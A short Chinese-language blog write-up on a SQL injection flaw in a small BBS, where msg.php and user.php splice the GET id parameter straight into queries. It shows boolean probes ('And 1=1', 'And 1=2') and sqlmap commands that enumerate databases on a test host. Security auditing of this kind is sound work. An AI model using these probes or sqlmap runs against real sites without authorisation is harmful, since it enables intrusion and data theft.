前言
这个漏洞的成因主要是因为程序对用户的输入没有进行过滤而导致的
这个bbs也是我挖的前一天才更新的,还说已经解决了SQL注入的问题,我看了下源码,属实解决了个寂寞啊…
代码审计
手动测试了一下,And 1=1 返回正常
And 1=2 返回404页面
先来看一下msg.php的代码吧
可以看到,GET过来的id直接赋值给了$id,下面的sql语句也是直接拼接进去的,连个单引号都没加
再来看一下user.php
嗯,的确是一个人写的代码,一样的没有加过滤之类的代码级防护
漏洞验证
Sqlmap -u "http://1.1.1.137:8002/msg.php?id=1"
跑一下库
Sqlmap -u "http://1.1.1.137:8002/msg.php?id=1" --dbs